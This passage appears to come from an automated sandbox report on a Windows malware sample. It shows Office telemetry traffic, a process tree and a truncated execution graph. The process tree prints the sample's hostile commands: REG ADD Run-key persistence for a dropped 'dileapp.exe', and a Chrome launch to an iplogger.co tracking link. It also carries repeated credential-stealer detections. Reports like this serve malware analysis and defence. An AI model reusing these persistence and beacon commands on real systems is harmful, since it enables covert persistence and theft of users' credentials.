                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
Timestamp: 2024-11-29 22:11:58 UTC | Bytes transferred: 494 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:58 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1399
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT
                                                                                                                                      ETag: "0x8DC582BE976026E"
                                                                                                                                      x-ms-request-id: 5bc480f4-b01e-001e-79d9-410214000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221158Z-174f7845968psccphC1EWRuz9s00000010t000000000adk1
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
Timestamp: 2024-11-29 22:11:58 UTC | Bytes transferred: 1399 | Direction: IN | Data:
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr


Session ID: 148 | Source IP: 192.168.2.4 | Source Port: 49901 | Destination IP: 13.107.246.63 | Destination Port: 443
Timestamp: 2024-11-29 22:11:58 UTC | Bytes transferred: 192 | Direction: OUT | Data:
GET /rules/rule702300v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
Timestamp: 2024-11-29 22:11:59 UTC | Bytes transferred: 494 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:59 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1362
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                      ETag: "0x8DC582BDC13EFEF"
                                                                                                                                      x-ms-request-id: 069bf3a9-401e-0016-0bf6-4153e0000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221159Z-174f7845968nxc96hC1EWRspw8000000108g00000000bku7
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
Timestamp: 2024-11-29 22:11:59 UTC | Bytes transferred: 1362 | Direction: IN | Data:
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">


Session ID: 149 | Source IP: 192.168.2.4 | Source Port: 49902 | Destination IP: 13.107.246.63 | Destination Port: 443
Timestamp: 2024-11-29 22:11:58 UTC | Bytes transferred: 192 | Direction: OUT | Data:
GET /rules/rule703401v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
Timestamp: 2024-11-29 22:11:59 UTC | Bytes transferred: 494 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:59 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1425
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                      ETag: "0x8DC582BE6BD89A1"
                                                                                                                                      x-ms-request-id: c922d918-601e-0032-6e42-41eebb000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221159Z-174f7845968cpnpfhC1EWR3afc000000101g00000000n2u2
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
Timestamp: 2024-11-29 22:11:59 UTC | Bytes transferred: 1425 | Direction: IN | Data:
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus


                                                                                                                                      Target ID:0
                                                                                                                                      Start time:17:09:54
                                                                                                                                      Start date:29/11/2024
                                                                                                                                      Path:C:\Users\user\Desktop\file.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                      Imagebase:0x790000
                                                                                                                                      File size:2'210'104 bytes
                                                                                                                                      MD5 hash:EFF5FBE427181FE1A3EED978CF0C9A36
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:1
                                                                                                                                      Start time:17:09:55
                                                                                                                                      Start date:29/11/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\s.bat" "
                                                                                                                                      Imagebase:0x240000
                                                                                                                                      File size:236'544 bytes
                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:2
                                                                                                                                      Start time:17:09:55
                                                                                                                                      Start date:29/11/2024
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                      File size:862'208 bytes
                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:3
                                                                                                                                      Start time:17:09:55
                                                                                                                                      Start date:29/11/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\reg.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\dileapp.exe"
                                                                                                                                      Imagebase:0x1c0000
                                                                                                                                      File size:59'392 bytes
                                                                                                                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:4
                                                                                                                                      Start time:17:09:55
                                                                                                                                      Start date:29/11/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\reg.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\dileapp.exe"
                                                                                                                                      Imagebase:0x1c0000
                                                                                                                                      File size:59'392 bytes
                                                                                                                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:5
                                                                                                                                      Start time:17:09:55
                                                                                                                                      Start date:29/11/2024
                                                                                                                                      Path:C:\Users\Public\Netstat\dileapp.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Users\Public\Netstat\dileapp.exe
                                                                                                                                      Imagebase:0xfd0000
                                                                                                                                      File size:1'928'704 bytes
                                                                                                                                      MD5 hash:B0D5568D499D1DFA75064E85E9FB3EAC
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Antivirus matches:
                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:6
                                                                                                                                      Start time:17:09:55
                                                                                                                                      Start date:29/11/2024
                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.co/1tJFB4
                                                                                                                                      Imagebase:0x7ff76e190000
                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:false

                                                                                                                                      Target ID:7
                                                                                                                                      Start time:17:09:57
                                                                                                                                      Start date:29/11/2024
                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2400 --field-trial-handle=2324,i,4398833279190329867,13329652877224492584,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                      Imagebase:0x7ff76e190000
                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:9
                                                                                                                                      Start time:17:10:04
                                                                                                                                      Start date:29/11/2024
                                                                                                                                      Path:C:\Users\Public\Netstat\dileapp.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\Public\Netstat\dileapp.exe"
                                                                                                                                      Imagebase:0xfd0000
                                                                                                                                      File size:1'928'704 bytes
                                                                                                                                      MD5 hash:B0D5568D499D1DFA75064E85E9FB3EAC
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:10
                                                                                                                                      Start time:17:10:11
                                                                                                                                      Start date:29/11/2024
                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3472 --field-trial-handle=2324,i,4398833279190329867,13329652877224492584,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                      Imagebase:0x7ff76e190000
                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:false

                                                                                                                                      Target ID:12
                                                                                                                                      Start time:17:10:12
                                                                                                                                      Start date:29/11/2024
                                                                                                                                      Path:C:\Users\Public\Netstat\dileapp.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\Public\Netstat\dileapp.exe"
                                                                                                                                      Imagebase:0xfd0000
                                                                                                                                      File size:1'928'704 bytes
                                                                                                                                      MD5 hash:B0D5568D499D1DFA75064E85E9FB3EAC
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000003.1952649413.0000000001B0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000003.1926780706.0000000001B11000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000003.1900851363.0000000001B32000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000003.1980367222.0000000001B0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000003.1982622436.0000000001B28000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000003.1954874686.0000000001B0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:15
                                                                                                                                      Start time:17:10:21
                                                                                                                                      Start date:29/11/2024
                                                                                                                                      Path:C:\Users\Public\Netstat\dileapp.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\Public\Netstat\dileapp.exe"
                                                                                                                                      Imagebase:0xfd0000
                                                                                                                                      File size:1'928'704 bytes
                                                                                                                                      MD5 hash:B0D5568D499D1DFA75064E85E9FB3EAC
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000003.1982904201.0000000000F67000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000003.2008902691.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000003.1983969551.0000000000F5D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000003.2033433013.0000000000F59000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000003.1983497240.0000000000F5D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000003.2058427523.0000000000F59000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000003.2063694200.0000000000F69000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000003.2033655753.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000003.2064442018.0000000000F6F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000003.1982875210.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000003.2034685044.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000003.1984430461.0000000000F5D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000003.2058810259.0000000000F5A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true


                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:10.4%
                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                        Signature Coverage:9.8%
                                                                                                                                        Total number of Nodes:1489
                                                                                                                                        Total number of Limit Nodes:26
7aa3c2 23038->23043 23039 7aa0e3 23126 7912c2 GetDlgItem ShowWindow 23039->23126 23117 7994f1 23041->23117 23046 7aa082 23042->23046 23043->23012 23047 7aa3cb DialogBoxParamW 23043->23047 23045 7a9edc 23049 793f5b _swprintf 51 API calls 23045->23049 23051 793f5b _swprintf 51 API calls 23046->23051 23047->22946 23047->23012 23048 7aa0ed 23053 79d142 54 API calls 23048->23053 23050 7a9efe CreateFileMappingW 23049->23050 23055 7a9f60 GetCommandLineW 23050->23055 23087 7a9fdd __vswprintf_c_l 23050->23087 23056 7aa0a0 23051->23056 23054 7aa0f7 SetDlgItemTextW 23053->23054 23127 7912c2 GetDlgItem ShowWindow 23054->23127 23060 7a9f71 23055->23060 23069 79d142 54 API calls 23056->23069 23057 7a9e6a 23061 7a9e78 23057->23061 23062 7a9e71 GetLastError 23057->23062 23058 7a9fe8 ShellExecuteExW 23082 7aa005 23058->23082 23207 7a97e4 SHGetMalloc 23060->23207 23065 799437 72 API calls 23061->23065 23062->23061 23063 7aa10b SetDlgItemTextW GetDlgItem 23066 7aa13c 23063->23066 23067 7aa124 GetWindowLongW SetWindowLongW 23063->23067 23065->23022 23128 7aaa45 23066->23128 23067->23066 23068 7a9f8d 23208 7a97e4 SHGetMalloc 23068->23208 23069->22946 23073 7a9f99 23209 7a97e4 SHGetMalloc 23073->23209 23074 7aa048 23074->23033 23081 7aa05e UnmapViewOfFile CloseHandle 23074->23081 23075 7aaa45 91 API calls 23077 7aa158 23075->23077 23153 7abc78 23077->23153 23078 7a9fa5 23210 79dfde 73 API calls ___scrt_get_show_window_mode 23078->23210 23081->23033 23082->23074 23085 7aa034 Sleep 23082->23085 23084 7a9fbc MapViewOfFile 23084->23087 23085->23074 23085->23082 23087->23058 23093 791349 23092->23093 23094 7912f0 23092->23094 23234 79ceb0 GetWindowLongW SetWindowLongW 23093->23234 23095 791356 23094->23095 23216 79ced7 23094->23216 23095->22936 23095->22937 23095->23001 23099 791325 GetDlgItem 23099->23095 23100 791335 23099->23100 23100->23095 23101 79133b SetWindowTextW 23100->23101 23101->23095 23103 7ab76a SendMessageW SendMessageW 23102->23103 23104 7ab73a 23102->23104 23105 7ab7a2 
23103->23105 23106 7ab7c1 SendMessageW SendMessageW SendMessageW 23103->23106 23107 7ab745 ShowWindow SendMessageW SendMessageW 23104->23107 23105->23106 23108 7ab80b SendMessageW 23106->23108 23109 7ab7ec SendMessageW 23106->23109 23107->23103 23108->22983 23109->23108 23112 799cd8 23110->23112 23111 799d69 23113 799e86 9 API calls 23111->23113 23114 799d92 23111->23114 23112->23111 23112->23114 23238 799e86 23112->23238 23113->23114 23114->22997 23114->22998 23116->23008 23118 7994fb 23117->23118 23119 799565 CreateFileW 23118->23119 23120 799559 23118->23120 23119->23120 23121 7995b7 23120->23121 23122 79b275 2 API calls 23120->23122 23121->23057 23123 79959e 23122->23123 23123->23121 23124 7995a2 CreateFileW 23123->23124 23124->23121 23125->23039 23126->23048 23127->23063 23129 7aaa4f __EH_prolog 23128->23129 23130 7aa14a 23129->23130 23131 7a96ec ExpandEnvironmentStringsW 23129->23131 23130->23075 23142 7aaa86 _wcsrchr 23131->23142 23133 7a96ec ExpandEnvironmentStringsW 23133->23142 23134 7aad86 SetWindowTextW 23134->23142 23137 7b20de 22 API calls 23137->23142 23139 7aab77 SetFileAttributesW 23141 7aac32 GetFileAttributesW 23139->23141 23150 7aab6a ___scrt_get_show_window_mode 23139->23150 23143 7aac40 DeleteFileW 23141->23143 23141->23150 23142->23130 23142->23133 23142->23134 23142->23137 23145 7aaf50 GetDlgItem SetWindowTextW SendMessageW 23142->23145 23148 7aaf92 SendMessageW 23142->23148 23142->23150 23259 7a0b12 CompareStringW 23142->23259 23260 7a8b8e GetCurrentDirectoryW 23142->23260 23261 79a1a9 7 API calls 23142->23261 23264 79a132 FindClose 23142->23264 23265 7a9844 69 API calls new 23142->23265 23143->23150 23145->23142 23147 793f5b _swprintf 51 API calls 23149 7aac75 GetFileAttributesW 23147->23149 23148->23142 23149->23150 23151 7aac86 MoveFileW 23149->23151 23150->23139 23150->23141 23150->23142 23150->23147 23262 79b100 52 API calls 2 library calls 23150->23262 23263 79a1a9 7 API calls 23150->23263 23151->23150 23152 7aac9e MoveFileExW 
23151->23152 23152->23150 23154 7abc82 __EH_prolog 23153->23154 23266 79f165 69 API calls 23154->23266 23156 7abcb3 23267 795bb7 69 API calls 23156->23267 23158 7abcd1 23268 797b10 74 API calls 2 library calls 23158->23268 23160 7abd15 23269 797c84 23160->23269 23162 7abd24 23278 797ba0 23162->23278 23166 7ab8c9 23165->23166 23167 7a8ac0 6 API calls 23166->23167 23168 7ab8ce 23167->23168 23169 7ab8d6 GetWindow 23168->23169 23170 7aa236 23168->23170 23169->23170 23173 7ab8f2 23169->23173 23170->22942 23170->22943 23171 7ab8ff GetClassNameW 23779 7a0b12 CompareStringW 23171->23779 23173->23170 23173->23171 23174 7ab988 GetWindow 23173->23174 23175 7ab927 GetWindowLongW 23173->23175 23174->23170 23174->23173 23175->23174 23176 7ab937 SendMessageW 23175->23176 23176->23174 23177 7ab94d GetObjectW 23176->23177 23780 7a8b22 GetDC GetDeviceCaps ReleaseDC 23177->23780 23180 7ab962 23781 7a8adf GetDC GetDeviceCaps ReleaseDC 23180->23781 23782 7a8cf3 8 API calls ___scrt_get_show_window_mode 23180->23782 23182 7ab972 SendMessageW DeleteObject 23182->23174 23183->22958 23185 7a8fe9 23184->23185 23186 7a900e 23184->23186 23783 7a0b12 CompareStringW 23185->23783 23188 7a901c 23186->23188 23189 7a9013 SHAutoComplete 23186->23189 23192 7a9485 23188->23192 23189->23188 23190 7a8ffc 23190->23186 23191 7a9000 FindWindowExW 23190->23191 23191->23186 23193 7a948f __EH_prolog 23192->23193 23194 79137e 75 API calls 23193->23194 23195 7a94b1 23194->23195 23784 791edd 23195->23784 23198 7a94da 23201 7918f6 127 API calls 23198->23201 23199 7a94cb 23200 79162e 79 API calls 23199->23200 23202 7a94d6 23200->23202 23203 7a94fc __vswprintf_c_l new 23201->23203 23202->22985 23202->22989 23204 79162e 79 API calls 23203->23204 23204->23202 23205->22967 23206->23045 23207->23068 23208->23073 23209->23078 23210->23084 23212->23020 23213->23036 23214->23017 23215->23007 23235 79c88e 23216->23235 23218 79cefd GetWindowRect GetClientRect 23219 79cff2 23218->23219 23225 79cf57 23218->23225 23220 79d034 
GetSystemMetrics GetWindow 23219->23220 23221 79cffc GetWindowTextW 23219->23221 23227 79d054 23220->23227 23222 79c91f 52 API calls 23221->23222 23223 79d028 SetWindowTextW 23222->23223 23223->23220 23224 79cfb8 GetWindowLongW 23229 79cfe2 GetWindowRect 23224->23229 23225->23220 23225->23224 23226 791312 23226->23095 23226->23099 23227->23226 23228 79d060 GetWindowTextW 23227->23228 23230 79c91f 52 API calls 23227->23230 23231 79d11b GetWindow 23227->23231 23232 79d0a6 GetWindowRect 23227->23232 23228->23227 23229->23219 23233 79d093 SetWindowTextW 23230->23233 23231->23226 23231->23227 23232->23231 23233->23227 23234->23095 23236 79c91f 52 API calls 23235->23236 23237 79c8b6 _wcschr 23236->23237 23237->23218 23239 799e93 23238->23239 23240 799eb7 23239->23240 23242 799eaa CreateDirectoryW 23239->23242 23241 799dff 4 API calls 23240->23241 23243 799ebd 23241->23243 23242->23240 23244 799eea 23242->23244 23245 799efd GetLastError 23243->23245 23246 79b275 2 API calls 23243->23246 23248 799ef9 23244->23248 23251 79a0c3 23244->23251 23245->23248 23249 799ed3 23246->23249 23248->23112 23249->23245 23250 799ed7 CreateDirectoryW 23249->23250 23250->23244 23250->23245 23252 7acec0 23251->23252 23253 79a0d0 SetFileAttributesW 23252->23253 23254 79a113 23253->23254 23255 79a0e6 23253->23255 23254->23248 23256 79b275 2 API calls 23255->23256 23257 79a0fa 23256->23257 23257->23254 23258 79a0fe SetFileAttributesW 23257->23258 23258->23254 23259->23142 23260->23142 23261->23142 23262->23150 23263->23150 23264->23142 23265->23142 23266->23156 23267->23158 23268->23160 23270 797c8e 23269->23270 23275 797cf8 23270->23275 23304 79a145 23270->23304 23272 797da4 23272->23162 23274 797d62 23274->23272 23310 796d0d 67 API calls 23274->23310 23275->23274 23276 79a145 8 API calls 23275->23276 23282 79820b 23275->23282 23276->23275 23279 797bae 23278->23279 23281 797bb5 23278->23281 23280 7a0e21 79 API calls 23279->23280 23280->23281 23283 798215 __EH_prolog 23282->23283 23311 79137e 
23283->23311 23285 798230 23319 799ba2 23285->23319 23291 79825f 23439 79162e 23291->23439 23292 7982fa 23338 7983a3 23292->23338 23295 79835a 23342 791e8e 23295->23342 23299 79825b 23299->23291 23299->23292 23302 79a145 8 API calls 23299->23302 23443 79b6cb CompareStringW 23299->23443 23300 798365 23300->23291 23346 793a20 23300->23346 23356 798409 23300->23356 23302->23299 23305 79a15a 23304->23305 23309 79a15e 23305->23309 23767 79a273 23305->23767 23307 79a16e 23308 79a173 FindClose 23307->23308 23307->23309 23308->23309 23309->23270 23310->23272 23312 791383 __EH_prolog 23311->23312 23445 79c413 23312->23445 23314 7913ba 23318 791413 ___scrt_get_show_window_mode 23314->23318 23451 7acdae 23314->23451 23317 79ac66 75 API calls 23317->23318 23318->23285 23320 799bad 23319->23320 23321 798246 23320->23321 23460 796e66 67 API calls 23320->23460 23321->23291 23323 7919b1 23321->23323 23324 7919bb __EH_prolog 23323->23324 23331 7919fd 23324->23331 23337 7919e4 23324->23337 23461 79135c 23324->23461 23326 791b16 23464 796d0d 67 API calls 23326->23464 23328 793a20 90 API calls 23333 791b6d 23328->23333 23329 791b26 23329->23328 23329->23337 23330 791bb7 23336 791bea 23330->23336 23330->23337 23465 796d0d 67 API calls 23330->23465 23331->23326 23331->23329 23331->23337 23333->23330 23334 793a20 90 API calls 23333->23334 23334->23333 23335 793a20 90 API calls 23335->23336 23336->23335 23336->23337 23337->23299 23339 7983b0 23338->23339 23483 79ffb8 GetSystemTime SystemTimeToFileTime 23339->23483 23341 798314 23341->23295 23444 7a06c8 65 API calls 23341->23444 23343 791e93 __EH_prolog 23342->23343 23344 791ec7 23343->23344 23485 7918f6 23343->23485 23344->23300 23347 793a2c 23346->23347 23348 793a30 23346->23348 23347->23300 23349 793a5d 23348->23349 23350 793a4f 23348->23350 23703 79276c 90 API calls 3 library calls 23349->23703 23352 793a8f 23350->23352 23702 793203 78 API calls 3 library calls 23350->23702 23352->23300 23354 793a5b 23354->23352 23704 791fd2 67 API 
